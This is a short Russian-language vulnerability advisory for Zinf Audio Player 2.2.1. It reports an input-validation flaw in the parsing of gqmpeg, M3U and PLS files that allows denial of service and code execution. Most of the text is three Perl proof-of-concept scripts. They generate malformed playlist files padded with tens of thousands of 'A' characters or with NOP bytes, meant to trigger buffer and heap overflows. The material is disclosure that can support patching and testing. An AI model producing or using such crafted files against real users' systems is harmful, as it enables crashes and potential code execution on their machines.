Программа: Zinf Audio Player 2.2.1

Уязвимость позволяет удаленному злоумышленнику осуществить DoS атаку и
выполнить произвольный код на целевой системе. Уязвимость существует из-за
ошибки в проверке входных данных при обработке gqmpeg, M3U и PLS файлов.
Атакующий может передать специально сформированные файлы, что приведет к отказу
системы в обслуживании и выполнению произвольного кода.

Эксплоит:

#!/usr/bin/perl
# Discovered & Written by : Hakxer
# Home : www.sec-geeks.com
# Program : http://www.zinf.org/ ../http://prdownloads.sourceforge.net/zinf/zinf-setup-2.2.1.exe
# Zinf Audio Player 2.2.1 ( gqmpeg FILE) Buffer Overflow PoC
# Greetz to : Egyptianxhacker,ProViDoR , Br1ght D@rk , Error Code , Kof2002 ,
Sql_Inj3ct0r , egy coders team , Sec-geeks.com

my $deamoddd="http://"."A" x 70000;

open(MYFILE,'>>hakxer.gqmpeg');

print MYFILE $deamoddd;

close(MYFILE);

print "PoC Created .. Hakxer [sec-geeks.com] EgY Coders Team";

Эксплоит:

#!/usr/bin/perl
# Discovered & Written by : Hakxer
# Home : www.sec-geeks.com
# Program : http://www.zinf.org/ ../http://prdownloads.sourceforge.net/zinf/zinf-setup-2.2.1.exe
# Zinf Audio Player 2.2.1 (M3U FILE)  Local Heap Overflow

my $chars="http://"."A" x 50000;

open(MYFILE,'>>hakxer.m3u');

print MYFILE $chars;

close(MYFILE);

print " Done";

Эксплоит:

#!/usr/bin/perl
# Discovered & Written by : Hakxer
# Home : www.sec-geeks.com
# Program : http://www.zinf.org/ ../http://prdownloads.sourceforge.net/zinf/zinf-setup-2.2.1.exe
# Zinf Audio Player 2.2.1 (PLS FILE)  Buffer Overflow PoC

my $chars="\x90" x 2000;

open(MYFILE,'>>hakxer.pls');

print MYFILE $chars;

close(MYFILE);

print " PoC Created .. Hakxer [ Sec-Geeks.com ] EgY Coders Team";



Оставить мнение